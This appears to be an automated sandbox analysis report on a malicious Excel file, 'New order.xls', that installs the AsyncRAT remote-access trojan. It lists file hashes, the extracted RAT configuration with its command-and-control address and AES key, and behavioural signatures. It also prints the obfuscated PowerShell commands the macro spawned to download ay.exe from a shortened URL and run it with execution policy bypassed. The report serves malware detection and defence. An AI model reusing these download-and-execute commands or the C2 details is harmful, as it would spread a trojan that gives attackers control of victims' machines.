Analysis
-
max time kernel
135s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-12-2020 17:19
Static task
static1
Behavioral task
behavioral1
Sample
New order.xls
Resource
win7v20201028
General
-
Target
New order.xls
-
Size
80KB
-
MD5
bfa6b801f26f67cc2231d4191a2486e5
-
SHA1
d6c3fe24036c6b402eeb80e065a11280aa236625
-
SHA256
076c11df218d9fd86a809bb3e3b4a9c2211caad31e630d731d64592bee49eec4
-
SHA512
b06a89f9606533c9c7c6c0884c76c7e59919e1b66425e7e7f97d11bb2faafea80ed379c056c440269f3c6b132c297ea90172f54f893600747609d67a1202367b
Malware Config
Extracted
https://tinyurl.com/y6fpv3lj
Extracted
asyncrat
0.5.7B
66.63.162.20:6606
AsyncMutex_6SI8OkPnk
-
aes_key
RrDsbyhuW4EmI2uyYOZXhcgJIPtjUanF
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
66.63.162.20
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6606
-
version
0.5.7B
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exepowershell.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4248 4700 powershell.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2320 4700 powershell.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1864 4700 powershell.exe EXCEL.EXE -
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4636-38-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/4636-39-0x000000000040C71E-mapping.dmp asyncrat -
Looks for VirtualBox Guest Additions in registry 2 TTPs
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 19 4248 powershell.exe 21 4248 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
ay.exepid process 2684 ay.exe -
Looks for VMWare Tools registry key 2 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
ay.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ay.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ay.exe -
Deletes itself 1 IoCs
Processes:
EXCEL.EXEpid process 4700 EXCEL.EXE -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
ay.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum ay.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 ay.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ay.exedescription pid process target process PID 2684 set thread context of 4636 2684 ay.exe RegSvcs.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4700 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exeay.exepid process 2320 powershell.exe 4248 powershell.exe 1864 powershell.exe 2320 powershell.exe 1864 powershell.exe 4248 powershell.exe 1864 powershell.exe 2320 powershell.exe 4248 powershell.exe 2684 ay.exe 2684 ay.exe 2684 ay.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
EXCEL.EXEpid process 4700 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exeay.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 2320 powershell.exe Token: SeDebugPrivilege 4248 powershell.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeDebugPrivilege 2684 ay.exe Token: SeDebugPrivilege 4636 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 4700 EXCEL.EXE 4700 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE 4700 EXCEL.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
EXCEL.EXEpowershell.exeay.exedescription pid process target process PID 4700 wrote to memory of 4248 4700 EXCEL.EXE powershell.exe PID 4700 wrote to memory of 4248 4700 EXCEL.EXE powershell.exe PID 4700 wrote to memory of 1864 4700 EXCEL.EXE powershell.exe PID 4700 wrote to memory of 1864 4700 EXCEL.EXE powershell.exe PID 4700 wrote to memory of 2320 4700 EXCEL.EXE powershell.exe PID 4700 wrote to memory of 2320 4700 EXCEL.EXE powershell.exe PID 2320 wrote to memory of 2684 2320 powershell.exe ay.exe PID 2320 wrote to memory of 2684 2320 powershell.exe ay.exe PID 2320 wrote to memory of 2684 2320 powershell.exe ay.exe PID 2684 wrote to memory of 4628 2684 ay.exe RegSvcs.exe PID 2684 wrote to memory of 4628 2684 ay.exe RegSvcs.exe PID 2684 wrote to memory of 4628 2684 ay.exe RegSvcs.exe PID 2684 wrote to memory of 4636 2684 ay.exe RegSvcs.exe PID 2684 wrote to memory of 4636 2684 ay.exe RegSvcs.exe PID 2684 wrote to memory of 4636 2684 ay.exe RegSvcs.exe PID 2684 wrote to memory of 4636 2684 ay.exe RegSvcs.exe PID 2684 wrote to memory of 4636 2684 ay.exe RegSvcs.exe PID 2684 wrote to memory of 4636 2684 ay.exe RegSvcs.exe PID 2684 wrote to memory of 4636 2684 ay.exe RegSvcs.exe PID 2684 wrote to memory of 4636 2684 ay.exe RegSvcs.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New order.xls"1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y6fpv3lj','ay.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:temp};.('.'+'/ay.exe')2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ay.exe"C:\Users\Admin\AppData\Local\Temp\ay.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 20; Move-Item "ay.exe" -Destination "${enV`:temp}"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
d737fc27bbf2f3bd19d1706af83dbe3f
SHA1212d219394124968b50769c371121a577d973985
SHA256b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
7154a7ce3817a476dca78708c23e2799
SHA12153675b22d57da46daf336a402e867702f5f650
SHA256a117742fc3a07fbfc4d7ff923766049d6c2c0510d21f589595f37d40aaaa5307
SHA5126fda9e6e2f46a56ce611167c08efc1d74295b59aa365c757aaef89b25477c9263ea97468e2c134e90af634c9816b74db80745466da759e938ec83f507421769f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
e71aacec59c24399659bcdddf8e20e5b
SHA11f8fade188e695105c0308208bf23304d48a63f5
SHA2560087f4940427198ef2f1a386f3baf80482f0683f6cdee63f949d6f7c93561085
SHA5125ffd34b3f634e0568196de7e33d2067834ae1d6a4de6abc657f7630de6e31ff821949dc91c4e87d456d4ee3023cdfbf0048fd3fa6122096377820be6e29e693a
-
C:\Users\Admin\AppData\Local\Temp\ay.exeMD5
2a7d72ec0e6ad3921e8d4dee4c6873de
SHA1ef46dd592a91a1837abba07739c5a1150ca48c60
SHA2566d271e56dca462bf5b1e9b27de466986943e9227ffba986614b38f376bf68c8c
SHA5122ede9e22aa6c20ee9c65365059d2ca6cbf915c8f94f4ad82bbe15cedef974ef5f43103024ec1a024a665316b5a6b939a731e3e4dbfc7d390fa70d44713ae0cf6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
e73b5156c988e909dcc5823cd69dc8dc
SHA1a5f6b458ad0bdc6e238913d4ce56384587dd0793
SHA25648076c4ccc1948c604c9e2a88be8f37e0a99b0f7949bd9cb335bb2a61ecd81b6
SHA512a3148db8e007fc4c21a119338d38a143ad601c0760cc4ba818a5253303fd1ce9e84a5371760825d8973766a74d0064667578007d50e3901486eda61705d120d1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
36a171ab1d9935c7255ba9d818c28c7d
SHA1e30f5b084a3ba3142a48bdcbf68aeebc194ff7f5
SHA256397623ae34681cd73e75ba5670988014fa7f68a3884ab7c28d8a5661ce21e435
SHA512701a4e8adc53a996c9c8fe27266fdd2287dbfd4f57ada8bf796226801a224e6a421393590f1052e3724364f20d203add2a3169c22f456f6f0bce58c9cf0ed3ad
-
C:\Users\Admin\Documents\ay.exeMD5
2a7d72ec0e6ad3921e8d4dee4c6873de
SHA1ef46dd592a91a1837abba07739c5a1150ca48c60
SHA2566d271e56dca462bf5b1e9b27de466986943e9227ffba986614b38f376bf68c8c
SHA5122ede9e22aa6c20ee9c65365059d2ca6cbf915c8f94f4ad82bbe15cedef974ef5f43103024ec1a024a665316b5a6b939a731e3e4dbfc7d390fa70d44713ae0cf6
-
memory/1864-9-0x00007FF9809C0000-0x00007FF9813AC000-memory.dmpFilesize
9.9MB
-
memory/1864-5-0x0000000000000000-mapping.dmp
-
memory/1864-15-0x0000016D39FB0000-0x0000016D39FB1000-memory.dmpFilesize
4KB
-
memory/2320-6-0x0000000000000000-mapping.dmp
-
memory/2320-12-0x000001BE6FA10000-0x000001BE6FA11000-memory.dmpFilesize
4KB
-
memory/2320-10-0x00007FF9809C0000-0x00007FF9813AC000-memory.dmpFilesize
9.9MB
-
memory/2684-27-0x0000000005700000-0x0000000005701000-memory.dmpFilesize
4KB
-
memory/2684-29-0x0000000005850000-0x0000000005851000-memory.dmpFilesize
4KB
-
memory/2684-21-0x0000000000000000-mapping.dmp
-
memory/2684-37-0x0000000047290000-0x0000000047291000-memory.dmpFilesize
4KB
-
memory/2684-36-0x0000000047180000-0x00000000471B2000-memory.dmpFilesize
200KB
-
memory/2684-24-0x0000000073FA0000-0x000000007468E000-memory.dmpFilesize
6.9MB
-
memory/2684-25-0x0000000000E40000-0x0000000000E41000-memory.dmpFilesize
4KB
-
memory/2684-34-0x0000000005AD0000-0x0000000005AD8000-memory.dmpFilesize
32KB
-
memory/2684-28-0x0000000005D50000-0x0000000005D51000-memory.dmpFilesize
4KB
-
memory/2684-33-0x0000000047040000-0x000000004708F000-memory.dmpFilesize
316KB
-
memory/2684-30-0x00000000057C0000-0x00000000057C1000-memory.dmpFilesize
4KB
-
memory/2684-31-0x0000000005A20000-0x0000000005A21000-memory.dmpFilesize
4KB
-
memory/2684-32-0x0000000026C30000-0x0000000046C18000-memory.dmpFilesize
511.9MB
-
memory/4248-4-0x0000000000000000-mapping.dmp
-
memory/4248-11-0x00007FF9809C0000-0x00007FF9813AC000-memory.dmpFilesize
9.9MB
-
memory/4636-38-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4636-39-0x000000000040C71E-mapping.dmp
-
memory/4636-40-0x0000000073FA0000-0x000000007468E000-memory.dmpFilesize
6.9MB
-
memory/4700-2-0x00007FF988D80000-0x00007FF9893B7000-memory.dmpFilesize
6.2MB
-
memory/4700-3-0x0000026EB08C0000-0x0000026EB08C1000-memory.dmpFilesize
4KB